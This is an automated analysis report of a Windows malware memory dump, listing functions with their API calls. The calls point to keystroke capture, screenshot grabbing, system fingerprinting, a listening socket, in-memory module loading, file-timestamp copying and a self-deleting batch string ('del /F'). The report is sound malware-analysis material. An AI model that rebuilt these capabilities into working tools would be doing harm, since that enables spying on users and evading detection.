Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00CD4046
LeaveCriticalSection.KERNEL32 ref: 00CD405C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD3906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00CE5594: GetSystemTime.KERNEL32(?), ref: 00CE55BA
Part of subcall function 00CE5594: Sleep.KERNEL32(000005DC), ref: 00CE55D3
Part of subcall function 00CE5594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 00CE55DC

Part of subcall function 00CCECBD: memcmp.MSVCRT ref: 00CCED1A
Part of subcall function 00CCECBD: memcpy.MSVCRT ref: 00CCED5A

Part of subcall function 00CE4BA2: memcpy.MSVCRT ref: 00CE4BB2

Part of subcall function 00CCEE09: memset.MSVCRT ref: 00CCEE1C
Part of subcall function 00CCEE09: memcpy.MSVCRT ref: 00CCEE37
Part of subcall function 00CCEE09: memcpy.MSVCRT ref: 00CCEE5F
Part of subcall function 00CCEE09: memcpy.MSVCRT ref: 00CCEE83

memset.MSVCRT ref: 00CD39D5

Part of subcall function 00CCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCD70
Part of subcall function 00CCCD5A: memcpy.MSVCRT ref: 00CCCDCD
Part of subcall function 00CCCD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1,?,00000002), ref: 00CCCDDD
Part of subcall function 00CCCD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00CCCE11
Part of subcall function 00CCCD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00CD3FA1), ref: 00CCCE9F

Part of subcall function 00CCF1A8: EnterCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1B8
Part of subcall function 00CCF1A8: LeaveCriticalSection.KERNEL32(00D03510,?,00CCC78E,?,?,?,00000001,00CE4DE8,00000001), ref: 00CCF1E2

memcpy.MSVCRT ref: 00CD3A30

Part of subcall function 00CCCEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CCCEB9

memcmp.MSVCRT ref: 00CD3AAB

Part of subcall function 00CD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00CD6A43
Part of subcall function 00CD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00CECB50,?,00000000,00000001,00000001,00CECB1A,?,00CD54E4,?,@echo off%sdel /F "%s",?), ref: 00CD6A56

memcpy.MSVCRT ref: 00CD3AFF

Part of subcall function 00CCF0E1: memcmp.MSVCRT ref: 00CCF0FD

Part of subcall function 00CCF1EF: memcmp.MSVCRT ref: 00CCF1FB

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

Part of subcall function 00CD23F1: memcpy.MSVCRT ref: 00CD2409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00CD3BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00CD3BF0

Part of subcall function 00CCEEA9: memcpy.MSVCRT ref: 00CCEED2

Part of subcall function 00CCEDAE: memcpy.MSVCRT ref: 00CCEDF9

Part of subcall function 00CCF040: memcmp.MSVCRT ref: 00CCF0B6

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CFE360: _errno.MSVCRT ref: 00CFE37B
Part of subcall function 00CFE360: _errno.MSVCRT ref: 00CFE3AD

Strings

2, xrefs: 00CD3B51

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD5150, Relevance: 12.5, APIs: 7, Instructions: 72

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 00CD5160
GetTokenInformation.ADVAPI32(00000001,00000019,00000000,00000000,?), ref: 00CD5179
GetLastError.KERNEL32(?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD5183

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

GetTokenInformation.ADVAPI32(00000001,00000019,?,?,?), ref: 00CD51AE
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD51BA
GetSidSubAuthority.ADVAPI32(?,?,?,?,?,?,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD51D1

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

CloseHandle.KERNEL32(00000001), ref: 00CD51FD

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF3382, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172

APIs

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

WSASetLastError.WS2_32(00000008,?,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00CF33A6
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,?), ref: 00CF33F2

Part of subcall function 00CF2EA3: WSAGetLastError.WS2_32(?,?,?,?,?,?,00CCFD6D,?,00000004,00007530,?,?,?,?), ref: 00CF2ED9
Part of subcall function 00CF2EA3: WSASetLastError.WS2_32(?), ref: 00CF2F21

WSAGetLastError.WS2_32(?,00000800,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?), ref: 00CF34D2
shutdown.WS2_32(?,00000001), ref: 00CF34FD
WaitForMultipleObjects.KERNEL32(?,?,00000000,?), ref: 00CF3526

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

WSASetLastError.WS2_32(0000274C,?,?,?,?,?,?,?,?,00000000,?,?,?,00000001,?,00002710), ref: 00CF357A

Strings

, xrefs: 00CF34E3

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCDFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 00CCE010
LeaveCriticalSection.KERNEL32 ref: 00CCE0C0

Part of subcall function 00CD4085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00CD4097
Part of subcall function 00CD4085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00CD40AF
Part of subcall function 00CD4085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CD40EE
Part of subcall function 00CD4085: CreateCompatibleDC.GDI32 ref: 00CD40FF
Part of subcall function 00CD4085: LoadCursorW.USER32(00000000,00007F00), ref: 00CD4115
Part of subcall function 00CD4085: GetIconInfo.USER32(?,?), ref: 00CD4129
Part of subcall function 00CD4085: GetCursorPos.USER32(?), ref: 00CD4138
Part of subcall function 00CD4085: GetDeviceCaps.GDI32(?,00000008), ref: 00CD414F
Part of subcall function 00CD4085: GetDeviceCaps.GDI32(?,0000000A), ref: 00CD4158
Part of subcall function 00CD4085: CreateCompatibleBitmap.GDI32(?,?), ref: 00CD4164
Part of subcall function 00CD4085: SelectObject.GDI32 ref: 00CD4172
Part of subcall function 00CD4085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00CD4193
Part of subcall function 00CD4085: DrawIcon.USER32(?,?,?,?), ref: 00CD41C5
Part of subcall function 00CD4085: SelectObject.GDI32(?,00000008), ref: 00CD41E1
Part of subcall function 00CD4085: DeleteObject.GDI32 ref: 00CD41E8
Part of subcall function 00CD4085: DeleteDC.GDI32 ref: 00CD41EF
Part of subcall function 00CD4085: DeleteDC.GDI32 ref: 00CD41F6
Part of subcall function 00CD4085: FreeLibrary.KERNEL32(?), ref: 00CD4206
Part of subcall function 00CD4085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00CD421C
Part of subcall function 00CD4085: FreeLibrary.KERNEL32(?), ref: 00CD4230

GetTickCount.KERNEL32 ref: 00CCE06A
GetCurrentProcessId.KERNEL32 ref: 00CCE071

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

GetKeyboardState.USER32(?), ref: 00CCE0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 00CCE0FF

Part of subcall function 00CCDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00CCE138,?,?,?,?,?,00000009,00000000), ref: 00CCDE7E
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDEEF
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF13
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF2A
Part of subcall function 00CCDE64: memcpy.MSVCRT ref: 00CCDF4A
Part of subcall function 00CCDE64: LeaveCriticalSection.KERNEL32 ref: 00CCDF65

Strings

, xrefs: 00CCE11D

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCB28A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94

APIs

memset.MSVCRT ref: 00CCB29B
GlobalMemoryStatusEx.KERNEL32(?), ref: 00CCB2B2
GetNativeSystemInfo.KERNEL32(?), ref: 00CCB2E3

Part of subcall function 00CE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00CE0D60

GetSystemMetrics.USER32(0000004F), ref: 00CCB370

Part of subcall function 00CE0FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00CEBD4B,?), ref: 00CE0FF2

Part of subcall function 00CE0D19: RegFlushKey.ADVAPI32 ref: 00CE0D29
Part of subcall function 00CE0D19: RegCloseKey.ADVAPI32 ref: 00CE0D31

GetSystemMetrics.USER32(00000050), ref: 00CCB363
GetSystemMetrics.USER32(0000004E), ref: 00CCB36A

Strings

@, xrefs: 00CCB2AB

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEB9D8, Relevance: 12.3, APIs: 5, Strings: 1, Instructions: 91

APIs

Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE439E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI ref: 00CE43A8
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE43F1
Part of subcall function 00CE432D: memcpy.MSVCRT ref: 00CE441E
Part of subcall function 00CE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4428

PathIsDirectoryW.SHLWAPI(?), ref: 00CEBA0E
CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000003,02000000,00000000), ref: 00CEBA30

Part of subcall function 00CEB883: memcpy.MSVCRT ref: 00CEB9B6

GetFileTime.KERNEL32(?,?,00000000,00000000), ref: 00CEBA76

Part of subcall function 00CCE717: memcpy.MSVCRT ref: 00CCE775
Part of subcall function 00CCE717: memcpy.MSVCRT ref: 00CCE78A
Part of subcall function 00CCE717: memcpy.MSVCRT ref: 00CCE79F
Part of subcall function 00CCE717: memcpy.MSVCRT ref: 00CCE7AE
Part of subcall function 00CCE717: SetFileTime.KERNEL32(?,?,?,?), ref: 00CCE813

CloseHandle.KERNEL32 ref: 00CEBA95
PathRemoveFileSpecW.SHLWAPI ref: 00CEBAA2

Part of subcall function 00CCE348: CloseHandle.KERNEL32 ref: 00CCE354

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00CEB9DE

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CE4ED1, Relevance: 12.3, APIs: 4, Strings: 2, Instructions: 60

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00CE4EE5
PathUnquoteSpacesW.SHLWAPI(?), ref: 00CE4F4A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00CE4F59
LocalFree.KERNEL32(00000001), ref: 00CE4F6D

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s, xrefs: 00CE4EFC
ProfileImagePath, xrefs: 00CE4F26

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCAB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00CCABB8
GetCommandLineW.KERNEL32 ref: 00CCABD9

Part of subcall function 00CF4333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00CF435D
Part of subcall function 00CF4333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00CF4392

GetUserNameExW.SECUR32(00000002,?), ref: 00CCAC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 00CCAC47
GetUserDefaultUILanguage.KERNEL32 ref: 00CCACB9
memcpy.MSVCRT ref: 00CCACED
memcpy.MSVCRT ref: 00CCAD02
memcpy.MSVCRT ref: 00CCAD18

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCFFC2, Relevance: 12.1, APIs: 8, Instructions: 120

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,00CD23DE,?,?,?,00000000), ref: 00CCFFCE
WaitForSingleObject.KERNEL32(?,00000000), ref: 00CD0009
CloseHandle.KERNEL32 ref: 00CD001C

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

memcpy.MSVCRT ref: 00CD003F
memset.MSVCRT ref: 00CD0059
memcpy.MSVCRT ref: 00CD009F
memset.MSVCRT ref: 00CD00BD

Part of subcall function 00CD5B40: EnterCriticalSection.KERNEL32(?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5B48
Part of subcall function 00CD5B40: WaitForSingleObject.KERNEL32(?,00000000), ref: 00CD5B6C
Part of subcall function 00CD5B40: CloseHandle.KERNEL32 ref: 00CD5B7C
Part of subcall function 00CD5B40: LeaveCriticalSection.KERNEL32(?,?,7C809F91,?,00CCD091,?,?,00000000,0000EA60,00000000), ref: 00CD5BAC

Part of subcall function 00CD5BB5: EnterCriticalSection.KERNEL32(00F51F44,00F51F38,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5BBE
Part of subcall function 00CD5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD5BF7
Part of subcall function 00CD5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00CDE48F,00000000,00000000,00000002), ref: 00CD5C16
Part of subcall function 00CD5BB5: GetLastError.KERNEL32(?,000000FF,00CDE48F,00000000,00000000,00000002,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001), ref: 00CD5C20
Part of subcall function 00CD5BB5: TerminateThread.KERNEL32 ref: 00CD5C28
Part of subcall function 00CD5BB5: CloseHandle.KERNEL32 ref: 00CD5C2F
Part of subcall function 00CD5BB5: LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5C44
Part of subcall function 00CD5BB5: ResumeThread.KERNEL32 ref: 00CD5C5D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00CD23DE,?,?,?,00000000), ref: 00CD0111

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCE35B, Relevance: 11.3, APIs: 6, Instructions: 129

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 00CCE376
PathAddBackslashW.SHLWAPI(?), ref: 00CCE3A0

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

CreateDirectoryW.KERNEL32(?), ref: 00CCE457
SetFileAttributesW.KERNEL32(?), ref: 00CCE468
CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00CCE481
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00CCE492

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6240, Relevance: 11.0, APIs: 6, Instructions: 115

APIs

lstrlenA.KERNEL32(?,?), ref: 00CD6279
CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CD62D1
GetLastError.KERNEL32(?,?,?,?), ref: 00CD62E1
CloseHandle.KERNEL32 ref: 00CD62EF

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

memcpy.MSVCRT ref: 00CD6319
memcpy.MSVCRT ref: 00CD632D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CD5406: CreateThread.KERNEL32(00000000,00000000,00CF54A0,?), ref: 00CD5417
Part of subcall function 00CD5406: CloseHandle.KERNEL32 ref: 00CD5422

Part of subcall function 00CD2FB7: ReleaseMutex.KERNEL32 ref: 00CD2FBB
Part of subcall function 00CD2FB7: CloseHandle.KERNEL32 ref: 00CD2FC2

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD1B16, Relevance: 10.9, APIs: 6, Instructions: 65

APIs

CreateFileW.KERNEL32(00F51EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CD1B2F
GetFileSizeEx.KERNEL32(?,?), ref: 00CD1B42
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CD1B68
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00CD1B80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1B9E
CloseHandle.KERNEL32 ref: 00CD1BA7

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEBBA1, Relevance: 10.9, APIs: 6, Instructions: 57

APIs

Part of subcall function 00CE4214: EnterCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE422E
Part of subcall function 00CE4214: LeaveCriticalSection.KERNEL32(00D03510,?,00D02DB4,00000000,00000006,?,00CEBBC2,00D02DB4,?,?,00000000), ref: 00CE4261
Part of subcall function 00CE4214: CoTaskMemFree.OLE32(00000000), ref: 00CE42F6
Part of subcall function 00CE4214: PathRemoveBackslashW.SHLWAPI(?), ref: 00CE4303
Part of subcall function 00CE4214: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CE431A

PathRemoveBackslashW.SHLWAPI ref: 00CEBBCD
PathRemoveFileSpecW.SHLWAPI ref: 00CEBBDA
PathAddBackslashW.SHLWAPI ref: 00CEBBEB
GetVolumeNameForVolumeMountPointW.KERNEL32(?,?,00000064), ref: 00CEBBFE
CLSIDFromString.OLE32(?,00D02DB4,?,?,00000064,?,?,?,?,?,00000064,?,00D02DB4,?,?,00000000), ref: 00CEBC1A
memset.MSVCRT ref: 00CEBC2C

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6D02, Relevance: 10.9, APIs: 6, Instructions: 39

APIs

socket.WS2_32(?,00000001,00000006), ref: 00CD6D0E
bind.WS2_32 ref: 00CD6D2B
listen.WS2_32(?,00000001), ref: 00CD6D38
WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00CF15FC,?,?,?), ref: 00CD6D42
closesocket.WS2_32 ref: 00CD6D4B
WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00CF15FC,?,?,?), ref: 00CD6D52

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD0C35, Relevance: 10.9, APIs: 6, Instructions: 197

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CD0C9B
memcpy.MSVCRT ref: 00CD0CB5
VirtualProtect.KERNEL32(?,?,00000002,-00000048), ref: 00CD0CC8
memset.MSVCRT ref: 00CD0D1F
memcpy.MSVCRT ref: 00CD0D33
VirtualProtect.KERNEL32(?,?,?,-00000048), ref: 00CD0E22

Part of subcall function 00CD0FC3: LoadLibraryA.KERNEL32 ref: 00CD1013

Part of subcall function 00CD1149: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CD1158

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CEFA0A, Relevance: 10.8, APIs: 6, Instructions: 161

APIs

Part of subcall function 00CD69B0: HeapAlloc.KERNEL32(00000008,?,?,00CD519B,?,?,?,?,00CE46A1,?,00CE49A5,?,?,00000001), ref: 00CD69C1

EnterCriticalSection.KERNEL32(?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFB0C

Part of subcall function 00CEFE44: EnterCriticalSection.KERNEL32(?,00000000,?,?,00CEFB19,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFE4D
Part of subcall function 00CEFE44: LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,00CEFB19,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFE84

Part of subcall function 00CF046D: EnterCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF047A
Part of subcall function 00CF046D: LeaveCriticalSection.KERNEL32(00D030F4,?,?,00CCE3BD,00000000,?,?,00000001), ref: 00CF0488

LeaveCriticalSection.KERNEL32(?,?,?,77C475F0,7C809F91,?,?,?,?,00CCD004,00000000), ref: 00CEFB4D
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CEFB5C
SetEvent.KERNEL32 ref: 00CEFB6C
GetExitCodeThread.KERNEL32(?,?), ref: 00CEFB80
CloseHandle.KERNEL32 ref: 00CEFB96

Part of subcall function 00CD5BB5: EnterCriticalSection.KERNEL32(00F51F44,00F51F38,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5BBE
Part of subcall function 00CD5BB5: CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CD5BF7
Part of subcall function 00CD5BB5: DuplicateHandle.KERNEL32(000000FF,?,000000FF,00CDE48F,00000000,00000000,00000002), ref: 00CD5C16
Part of subcall function 00CD5BB5: GetLastError.KERNEL32(?,000000FF,00CDE48F,00000000,00000000,00000002,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001), ref: 00CD5C20
Part of subcall function 00CD5BB5: TerminateThread.KERNEL32 ref: 00CD5C28
Part of subcall function 00CD5BB5: CloseHandle.KERNEL32 ref: 00CD5C2F
Part of subcall function 00CD5BB5: LeaveCriticalSection.KERNEL32(00F51F44,?,00000001,00CDE48F,00000000,00CDE1B7,00000000,?,00000000,?,00000001,?,00CE4E98,?,00000001), ref: 00CD5C44
Part of subcall function 00CD5BB5: ResumeThread.KERNEL32 ref: 00CD5C5D

Part of subcall function 00CF01B2: memcmp.MSVCRT ref: 00CF01CB
Part of subcall function 00CF01B2: memcmp.MSVCRT ref: 00CF0227
Part of subcall function 00CF01B2: memcmp.MSVCRT ref: 00CF028D

Part of subcall function 00CD6A69: HeapFree.KERNEL32(00000000,00F51E90,00CD1877,?,00000000,00CE4986,?,?,00000001), ref: 00CD6A76

Part of subcall function 00CE4CA0: memcpy.MSVCRT ref: 00CE4CC6
Part of subcall function 00CE4CA0: memset.MSVCRT ref: 00CE4D69

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CCA150, Relevance: 10.8, APIs: 7, Instructions: 122

APIs

memcpy.MSVCRT ref: 00CCA18C
memcpy.MSVCRT ref: 00CCA1A1
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 00CCA1D3
memcpy.MSVCRT ref: 00CCA209
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 00CCA239
memcpy.MSVCRT ref: 00CCA26F
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 00CCA29F

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CF2D0B, Relevance: 10.7, APIs: 6, Instructions: 64

APIs

accept.WS2_32(?,0000EA60), ref: 00CF2D2C
WSAEventSelect.WS2_32(?,00000000,00000000), ref: 00CF2D3E

Part of subcall function 00CD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00CD17BF,?,00000000,00CE4986,?,?,00000001), ref: 00CD69A8

WSASetLastError.WS2_32(00000008,?,?,00000002,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00CCD163), ref: 00CF2D95

Part of subcall function 00CF2917: WSACreateEvent.WS2_32(00000000,?,00CF2C15,?,00000000,?,00CF2CD1,?,?,?,?,00000000), ref: 00CF292D
Part of subcall function 00CF2917: WSAEventSelect.WS2_32(?,?,00CF2CD1), ref: 00CF2943
Part of subcall function 00CF2917: WSACloseEvent.WS2_32(?), ref: 00CF2957

Part of subcall function 00CF2855: getsockopt.WS2_32(0000EA60,0000FFFF,00002004,?,?), ref: 00CF288F
Part of subcall function 00CF2855: memset.MSVCRT ref: 00CF28A3

WSAGetLastError.WS2_32(00000023,?,00000000,00000000,?,0000EA60,?,77C475F0,?,?,?,?,00CCD163,?), ref: 00CF2D6F
shutdown.WS2_32(?,00000002), ref: 00CF2D87
closesocket.WS2_32 ref: 00CF2D8E

Memory Dump Source

Source File: 00000005.00000002.1172807288.00CC0000.00000040.sdmp, Offset: 00CC0000, based on PE: true

Function 00CD6378, Relevance: 10.6, APIs: 7, Instructions: 146

APIs

Part of subcall function 00CD568C: TlsSetValue.KERNEL32(00000001,00CD638A), ref: 00CD5699

Part of subcall function 00CEBEE3: CreateMutexW.KERNEL32(00D02974,00000000,?), ref: 00CEBF05

GetCurrentThread.KERNEL32 ref: 00CD63A4
SetThreadPriority.KERNEL32 ref: 00CD63AB

Part of subcall function 00CE4B8D: WaitForSingleObject.KERNEL32(00000000,00CD63B6), ref: 00CE4B95

memset.MSVCRT ref: 00CD63ED
lstrlenA.KERNEL32(00000050), ref: 00CD6404

Part of subcall function 00CD5D25: memset.MSVCRT ref: 00CD5D35

Part of subcall function 00CE0A9A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00CE0AD8
Part of subcall function 00CE0A9A: PathRemoveFileSpecW.SHLWAPI(?), ref: 00CE0B26
Part of subcall function 00CE0A9A: FindFirstFileW.KERNEL32(?,?), ref: 00CE0B93
Part of subcall function 00CE0A9A: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00CE0BEA
Part of subcall function 00CE0A9A: SetLastError.KERNEL32(00000057,?), ref: 00CE0C5B
Part of subcall function 00CE0A9A: CloseHandle.KERNEL32 ref: 00CE0C95
Part of subcall function 00CE0A9A: FindNextFileW.KERNEL32(?,?), ref: 00CE0CC9
Part of subcall function 00CE0A9A: FindClose.KERNEL32 ref: 00CE0CF3

memset.MSVCRT ref: 00CD64CA
memcpy.MSVCRT ref: 00CD64DA

Part of subcall function 00CD6240: lstrlenA.KERNEL32(?,?), ref: 00CD6279
Part of subcall function 00CD6240: CreateMutexW.KERNEL32(00D02974,00000001,?), ref: 00CD62D1
